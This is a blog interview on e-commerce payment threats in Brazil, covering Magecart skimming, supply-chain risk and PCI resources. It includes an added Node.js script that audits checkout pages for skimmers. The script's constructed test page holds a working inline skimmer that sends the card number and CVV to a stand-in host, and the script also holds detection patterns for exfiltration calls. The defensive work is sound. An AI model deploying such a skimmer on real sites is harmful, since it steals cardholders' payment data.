It has been more than a year since the outbreak of the COVID-19 global pandemic, which has had a significant impact on health, lifestyles, and the way business is done. In the world of payments, many businesses have had to reinvent themselves and adapt to remote transactions and the world of e-commerce (in many cases on the cloud). In this blog post, we discuss the challenges e-commerce poses for payment security in Brazil with Carlos Caetano, Associate Regional Director, Brazil for the PCI Security Standards Council (PCI SSC), and Gerson Rolim, Antifraud and Internet Payments Steering Committees Coordinator, Camara-e.net. Camara-e.net is a member of the PCI Brazil Regional Engagement Board (REB), a board that represents the perspectives of PCI Participating Organizations and PCI constituents in Brazil, advising and providing feedback and guidance to the PCI SSC on standards and programs development and adoption in Brazil.
How has the COVID-19 global pandemic affected payments in Brazil?
Gerson Rolim: E-commerce has expanded rapidly during the pandemic and has forced many businesses to completely revamp their payment systems. According to the Brazilian Credit Card Companies Association (ABECS), remote transactions (mainly e-commerce) rose 30% in 2020 and are driving retail sales. In another study performed by Ebit | Nielsen in partnership with ELO, e-commerce sales were 47% higher in the first half of 2020 than during the same period in 2019, totaling more than R$ 38.8 billion.
This skyrocketing expansion and urgent market demand drove many acquirers and payment facilitators to rush to develop remote payment solutions to support existing clients as well as a new set of entrepreneurs who needed to shift their payment needs because of the impacts of the COVID-19 pandemic on the economy. The market demand often centered around the need for new e-commerce platforms that were quick to integrate and deploy.
E-commerce is expected to continue to grow in 2021 as the pandemic continues to drag on and reopening of the economy remains unpredictable.
What are some of the main challenges facing merchants in this changing payment environment?
Gerson Rolim: The dramatic rise of e-commerce throughout Brazil has caught the attention of cyber criminals who understand that growth in transactions and revenue also results in growth of credit card data and other financial and personal data that potentially can be compromised to be sold on the dark web.
Many merchants, especially small merchants who have had to move to e-commerce, do not have skilled information security staff to support them, nor do they understand the threats which they are currently facing. It is important for them to understand the threats and develop a plan to protect themselves against them.
More than ever, we think that the collaboration and information sharing to prevent fraud among competitors is the way to evolve in this battlefield. In order to address this challenge, our antifraud steering committee developed Observatore.org – a collaborative blockchain hub that connects the e-commerce ecosystem for information validation to prevent online fraud.
What are some of the threats businesses are facing when it comes to payments?
Carlos Caetano: Businesses face a multitude of attacks from cyber criminals every day. The PCI SSC has a dedicated webpage for merchants that explains many of the more common attacks and vulnerabilities such as malware, phishing, weak remote access, weak passwords, outdated patching and more. I would encourage merchants to familiarize themselves with these common attacks and vulnerabilities and take precautions to guard against them.
Some of the current attacks that are front and center in Brazil today include online skimming attacks. These attacks, referred to as Magecart attacks, infect e-commerce websites with malicious code known as sniffers or JavaScript (JS) sniffers and are very difficult to detect. Once a website is infected, payment card information is “skimmed” during a transaction without the merchant or consumer being aware that the information has been compromised. Magecart is an umbrella term used by some security researchers to describe several criminal hacking groups who are responsible for various online skimming attacks. The term has also been used to generally identify the type of attack being utilized by the groups. These attacks have been active since 2015 and represent the continuously evolving cyber threat behind several high-profile attacks against international organizations. The PCI SSC put out a bulletin on this type of attack which can serve as a helpful resource to better understand them.
Another prominent threat is third-party risk, or supply chain attacks. The payment industry embraced modern innovations for accepting payments, including the use of cloud services for e-commerce acceptance and third-party developers for developing mobile payment applications. There has also been general adoption of more complex software architectures and functions than the more simplistic payment architectures of the past. In this environment it is critical for organizations engaged in e-commerce to understand that updates for a vast majority of payment applications are happening much more frequently. These are targets focused on by criminal gangs since in most cases, there is publicly available software to exploit weaknesses and provide access to e-commerce environments.
Lastly, it is important to highlight that with regards to threats, many old problems are still big problems. For example, old vulnerabilities related to web applications are still among the top problems seen by experts. According to the Verizon 2020 DBIR, web applications were involved in 43% of the breaches. Injection vulnerabilities (SQL and PHP) are the most commonly exploited, with important figures also related to cross-site scripting (XSS) vulnerabilities. Injection flaws and XSS have been problems for more than 14 years in the OWASP Top 10. These vulnerabilities have been addressed in the PCI Data Security Standard (PCI DSS) since version 1.1 of the standard but are still happening and being exploited in 2021 web applications.
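As an added example (not code from the PCI SSC, Camara-e.net, or either interviewee), here is a small Node.js check a merchant could run over the HTML of their checkout page to surface the conditions Carlos Caetano describes above: third-party scripts loaded from origins the merchant never approved, approved cross-origin scripts loaded without Subresource Integrity, and inline scripts that combine card-field selectors with an exfiltration primitive, which is the pattern a JS sniffer needs in order to "skim" a transaction. The sample page, the origins (`shop.example`, `js.psp.example`, and so on), and the allowlist are all constructed for the example.

```javascript
// Added example, not part of the original page. Static audit of a checkout page
// for web-skimmer (Magecart) indicators. All origins and the sample HTML below
// are constructed; adjust the allowlist to the scripts you actually ship.

// Assumed first-party origin and the only third-party origin the merchant has approved.
const FIRST_PARTY_ORIGIN = "https://shop.example";
const ALLOWED_SCRIPT_ORIGINS = new Set([FIRST_PARTY_ORIGIN, "https://js.psp.example"]);

// Heuristic: an inline skimmer must read card fields AND send them somewhere.
const CARD_FIELD_WORDS = /card(number|_number|no)|cvv|cvc|expir/i;
const EXFIL_PRIMITIVES = /fetch\(|XMLHttpRequest|sendBeacon|new Image\(|\.src\s*=/i;

// Pull every <script> tag out of the page: its src (if any), whether it carries an
// integrity attribute, and its inline body.
function extractScripts(html) {
  const scripts = [];
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const attrs = m[1];
    const src = (attrs.match(/\bsrc\s*=\s*["']([^"']+)["']/i) || [])[1] || null;
    const integrity = /\bintegrity\s*=/i.test(attrs);
    scripts.push({ src, integrity, body: m[2] });
  }
  return scripts;
}

// Returns a list of findings; an empty list means nothing suspicious was seen.
function auditCheckoutScripts(html, allowedOrigins = ALLOWED_SCRIPT_ORIGINS) {
  const findings = [];
  for (const s of extractScripts(html)) {
    if (s.src) {
      let origin = null;
      try { origin = new URL(s.src, FIRST_PARTY_ORIGIN).origin; } catch (e) { origin = null; }
      if (!origin || !allowedOrigins.has(origin)) {
        findings.push({ kind: "unexpected-origin", src: s.src });
      } else if (origin !== FIRST_PARTY_ORIGIN && !s.integrity) {
        // An approved CDN or PSP script without SRI can be swapped upstream unnoticed.
        findings.push({ kind: "missing-sri", src: s.src });
      }
    } else if (CARD_FIELD_WORDS.test(s.body) && EXFIL_PRIMITIVES.test(s.body)) {
      findings.push({ kind: "inline-skimmer-pattern", snippet: s.body.trim().slice(0, 60) });
    }
  }
  return findings;
}

// Constructed checkout page: one clean first-party script, one PSP SDK with SRI,
// one approved script without SRI, one script from an unapproved origin, and an
// inline skimmer that reads the PAN and CVV and beacons them out via an Image.
const SAMPLE_CHECKOUT_HTML = `
<html><body>
<form id="checkout"><input name="cardnumber"><input name="cvv"></form>
<script src="/static/checkout.js"></script>
<script src="https://js.psp.example/sdk.js" integrity="sha384-CONSTRUCTEDPLACEHOLDER"></script>
<script src="https://js.psp.example/analytics.js"></script>
<script src="//cdn.stats-widget.example/w.js"></script>
<script>
  document.getElementById("checkout").addEventListener("submit", function () {
    var pan = document.querySelector("[name=cardnumber]").value;
    var cvv = document.querySelector("[name=cvv]").value;
    new Image().src = "https://collect.example/?d=" + btoa(pan + "|" + cvv);
  });
</script>
</body></html>`;

console.log(JSON.stringify(auditCheckoutScripts(SAMPLE_CHECKOUT_HTML), null, 2));
```

Run it with `node` against the HTML your checkout actually serves (fetch it from production, not from source control, so that a server-side modification shows up). The check is deliberately static, so it will not see a skimmer that a first-party file was modified to load at runtime or one injected through a compromised tag manager; pair it with a Content Security Policy that restricts `script-src` and `connect-src`, and with hashing your first-party scripts against a known-good baseline.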
What are some solutions and guidance for organizations who want to protect payments in their e-commerce platforms?
Carlos Caetano: Unfortunately, there is no silver bullet to protect against all e-commerce attacks. Security is achieved with a set of actions involving people, process and technology, but fortunately, there are standards and best practices that companies can adopt to address those threats and minimize the risk of being compromised.
PCI DSS provides a baseline of technical and operational requirements designed to protect account data. The 12 PCI DSS requirements and corresponding testing procedures can be used to assess e-commerce security against a set of mature requirements and provide a minimum set of requirements for protecting account data and tackling threats.
The Software Security Framework (SSF) is a new set of standards, supporting validation programs and certification listings for the secure design and development of modern payment software. Eligible payment software can be validated with the Secure Software Standard. Software vendors also can validate their software development life cycle by assessing it against the Secure Software Lifecycle Standard and educating their developers about how to properly secure payment data during development and testing. The PCI Security Standards Council (PCI SSC) recently published version 1.1 of the PCI Secure Software Standard and its supporting program documentation.
Small merchants that want to better understand security should consider reviewing the PCI SSC Data Security Essentials Resources, which provide simple guidance on why and how to keep customer payment data safe. The Guide to Safe Payments provides twelve basic security practices that e-commerce merchants can adopt to start protecting their business today.
The Guide to Safe Payments includes helpful tips for merchants who are operating in an e-commerce environment. Those tips include:
- Use strong passwords and change default ones
- Protect your card data and only store what you need
- Install patches from your vendors
- Ask your vendor partners for help if you need it
- Protect in-house access to your card data
- Limit remote access for your vendor partners - don’t give hackers easy access
- Use anti-virus software
- Get regular vulnerability scanning
- Use secure payment systems
- Protect your business from the Internet
- For the best protection, make your data useless to criminals
Where can people get more information about e-commerce payment security?
Gerson Rolim: I would encourage interested readers to visit our collaborative blockchain hub that connects the e-commerce ecosystem for information validation to prevent online fraud:
Carlos Caetano: The PCI SSC produces many resources that can serve to help assist in better understanding payment security. I would encourage people who would like more information about our standards, programs and general information about payment security to visit: